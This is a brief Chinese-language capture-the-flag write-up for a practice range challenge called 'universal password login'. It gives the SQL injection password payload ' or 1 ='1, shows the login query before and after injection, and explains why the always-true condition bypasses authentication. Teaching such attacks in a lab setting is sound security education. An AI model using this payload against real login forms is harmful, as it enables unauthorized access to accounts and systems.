ibug靶场(万能密码登陆）

题目很明显的标注，万能密码登陆

用户名随便输

密码： ' or 1 ='1

登陆拿到flag

select name,pass from tbAdmin where name='admin' and pass='123456'

输入密码: ' or 1='1

sql语句就变成下面这个样子：

select name,pass from tbAdmin where name='admin' and pass='' or 1='1'

1='1'永远为真，所以登陆成功